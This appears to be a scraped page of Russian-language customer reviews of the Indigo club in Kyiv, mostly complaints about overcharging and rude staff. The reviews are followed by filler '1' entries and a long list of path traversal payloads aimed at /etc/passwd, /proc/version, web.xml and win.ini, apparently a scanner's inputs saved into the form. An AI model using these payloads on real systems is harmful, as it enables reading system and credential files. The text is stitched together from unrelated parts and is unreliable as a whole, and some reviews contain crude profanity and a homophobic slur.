Дорогое и безвкусное место, люди которые строили явно старались а вот персонал показал себя не с лучшей стороны. Глаз цепляется за пыль а персонал слишком явно сканирует вас на наличие денег, обидно, быть обманутой в своих ожиданиях. Вердикт красивый фантик с бестолковым наполнением. Может что то и измениться но я этого ждать не собираюсь, и всем кто туда идет советую подумать дважды.
Привокзальная помойка. Безвкусный интерьер, скудное меню, напитки делают не профи. цены заоблачные (согласна платить хорошие деньги за хорошую пищу), обслуживание банкетов ужас. Уважайте себя. Не советую.
Место очень универсальное! У меня есть по Киеву в принципе любимые места среди ресторанчиков, баров, караоке и клубов. Но Indigo это единственное заведение, где есть все эти вещи и все они выполнены на высоком уровне! Особенно отмечу их новое меню, где даже мне как человеку, который постоянно висит на диетах, есть что выбрать.
В целом это идеальное место как для релакса, так и для деловой встречи!
Отвратительное место! Цены сумасшедшие не понятно за что! Контингент оставляет желать лучшего, какой то сельский притон, только с вокзала! Обслуживание такое же! Духота, кондиционеры или не работают или не справляются! Не советую туда идти, испорченный вечер!
Афигенное место, не трендите))
А мне понравилось, место интересное... Особенно понравилось на первом этаже, даже курить можно (это хорошо). Спасибо за хороший вечер.
На входе вас встречает охрана или че-то в этом плане( парниша голубоватого вида стоял) и пристально анализирует ваш лук. Уже настораживает... Дальше, если все же вам удалось зайти в кроссовках за 100 баксов)) вы попадаете в чудесную атмосферу дешевого гламура, от чего сразу хочется выпить и чего то покрепче, но увы толпа желающих говорит вам попробуй через час и вы с испорченным настроением ретируетесь от туда. Мой скромный опыт настоятельно рекомендует мне больше там не появляться.
развод! на спиртное обманывают
заказал 1 абсент цена 35 грн дали чек на 70 грн
бармен с кислой мордой сказал что он уже налил мне 2-ю порцию а в меню цена за 20мл
люди в каком нормальном клубе наливают шоты по 20мл? бред бред
Добрый день!
18. 03 ночью были у вас в клубе на дискотеке. Спустились на бар на 1 этаже уже с коктейлями. Один коктейль заказали на 1 этаже у бармена. Бармен выставил счет за 2 коктейля. На что ему ответили что оплачивать будем только 1 коктейль. Он начал не только хамить, но и покрывать матом, употребляя ужасные оскорбления и посылал нас нах***й. В итоге подошел охранник, сказал что проверит все по камерам, пока проверял мы ждали на баре. Проверив, охранник сообщил бармену что мы действительно заказывали 1 коктейль. Бармен пропал, даже ни извинился. Администратор был не известно где, не присутствовал при данной ситуации, соответственно извинения от человека на руководящей должности который непосредственно управляет персоналом заведения, мы тоже не получили. В общем такое отношение к гостям я считаю неприемлемым. Никто из нашей компании больше не захочет посещать ваш клуб, ведь в любой момент вас захотят "развести" и покрыть матом. Ведь очевидно, что ваш бармен или психически не уравновешен либо аферист, который хочет "замутить" на выпивших гостях. Следите за персоналом тщательнее. Девушка за баром в светлой кофточке тоже была абсолютно не приветлива, а бармен на другом этаже тоже нервно перечислял нам названия виски, мол меню смотрите. Ужас!
дешевка, а не клуб. Весь этот вонючий пафос, который за собой ничего не несет и персонал, который только спит и видит как бы на.. ать кого нибудь на бабло. Счет приносят не соответствующий действительности, а персонал встречает так ка будто ты им что то должен. Наберите людей которые на самом деле хотят работать. ОТСТОЙ!!!
1) клуб такая же дешевка как и форсаж.
2) счет приносят который на 40-50 грн больше чем должен. это пидарасы бармены так зарабатывают в наглую.
3) в коктейль кидают один лед, что пить нечего.
короче я там был первый и последний раз, причем съебался от туда через 1 час.
пидарасня там как руководство, бармены и музыка
Замечательная музыка, приветливые бармены. Был с девушкой, нам очень понравилось. Адекватная аудитория, все улыбаются. Буду посещать это заведение чаще
Очень крутое заведение, мне понравилось!
согласна полностью с первыми комментариями! что складывает впечатление о заведении? в первую очередь интерьер, потом обслуживание, кухня или бар, музыка и атмосфера. интерьер неплохой, но мало места для танцев, мало столиков-диванов, маленькие барки. но если с этим еще можно было бы смириться, то с отношением персонала к клиентам нет! для меня это один из важнейших показателей любого заведения. если тебе нахамили, смотрели на тебя как на врага народа, как было в моем случае, я о девушке за баркой, не знаю кто она, может быть у нее такой взгляд от природы... но с этим нужно что-то делать.. )) она явно отпугивает клиентов.. мне хотелось как мин спросить почему она так на меня пялится.. дальше не очень дружелюбный бармен, который этого и не скрывал.. не буду уже описывать все подробности. коктейли действительно невкусные, куча льда... по цене виски-кола от 80грн.. другие лонги от 110... по-моему. музыка вообще не впечатлила... под нее не хотелось танцевать.. абсолютно... даже виски-кола не помогали... )) был неплохой мс, но клубу явно нужно пересмотреть свою позицию относительно музыки. хотя возможно дело в диджее, я не знаю он там на постоянной основе или нет. ( был dj lutique) хотя похоже он там всегда. вообще все это движение было похоже на собрание людей, которым на самом деле не весело, но они должны танцевать.. потому что уже заплатили за вход.. или просто пришли туда. у заведения просто отсутствует атмосфера. но это все о самом клубе. мы ушли через 1-1, 5 где-то... больше туда не вернусь. но на первом этаже неплохо, музыка была намного лучше и веселее, там можно курить.. и плюс и минус.. потому что сильно прокурено. но там было явно веселее чем наверху, в самом клубе.
Заведение достойное! Начну пожалуй с барного меню. Если человек внимательный то он увидит за какое количество и чего он плотит деньги! Потому что марка многих порций в меню составляет не 50 гр а 40гр. По поводу счёта который больше на небольшую сумму. Эта сумма называется процент за обслуживание! Для неусведомленных жлобов которые не знают что такое чаевые для официанта. Контингент испортился не спорю. Потому что когда раньше приходили отдыхать не было пьяных приставучих селюков которые расспускают руки. Сейчас фейс контроль начал паршиво работать. Но я верю что любимое заведение станет лучше!
Ходили с подругами в караоке очень часто только из за Андрюши Инкина и Коленьки. Хотя как то раз к нам подходил так называемый арт директор который пытался за наш счёт выпить да ещё и говорил что если мы с подругами напишем плохие отзывы о ведущих и администраторе (извиняюсь но не помню имени красивая блондинка) то он нам даст скидочные карты. Не раз во время нашего отдыха когда приходил этот "директор" он позволял себе забирать микрофон и петь песни во время очереди посетителей садится к гостям за стол и заказывает за их счёт без их разрешения. Так что будьте аккуратный с этим типом! А как вчера оказалось Андрюшу и Коленьку уволили! И как вы думаете почему? Конечно благодаря их директору! Так вот уважаемый управляющий Индиго (так как владелец я думаю это не увидит) примите меры и верните персонал к которому люди идут, а не мерзкого арт-директора который портит вечер и после которого не хочется в кам ни ногой!
1
1
1
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /proc/version
.. %2f.. %2f.. %2f.. %2f.. %2f.. %2f.. %2f.. %2f.. %2f.. %2fetc%2fpasswd%00. jpg
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd
/.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //etc/passwd
. \. /. \. /. \. /. \. /. \. /. \. /etc/passwd
/etc/passwd
%2fetc%2fpasswd
/.. /. /.. /. /.. /. /.. /. /.. /. /.. /. /.. /. /.. /etc/. /passwd%00
.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //etc/passwd
.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /etc/passwd
.. аЇ.. аЇ.. аЇ.. аЇ.. аЇ.. аЇ.. аЇ.. аЇetc/passwd
invalid.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd/. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /. /.
/.. /.. /.. /.. /.. /.. /.. /etc/passwd
web-inf/web. xml
/web-inf/web. xml
web-infweb. xml
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /windows/win. ini
c:windowssystem32drive rsetchosts
.. /.. /.. /.. /.. /.. /.. /.. /.. /.. /windows/win. ini
а®а®аЇа®а®аЇа®а®аЇа®а®аЇа ®а®аЇа®а®аЇа®а®аЇа®а®аЇwi ndowsаЇwin. ini
... windowswin. ini
.. .. .. .. .. .. .. .. windowswin. ini
/. \. /. \. /. \. /. \. /. \. /. \. /windows/win. ini
.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //.. /.. //windows/win. ini
.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /.. /... /.. /. /windows/win. ini
1
1
1
1
1
1
1
1
1
1
1
1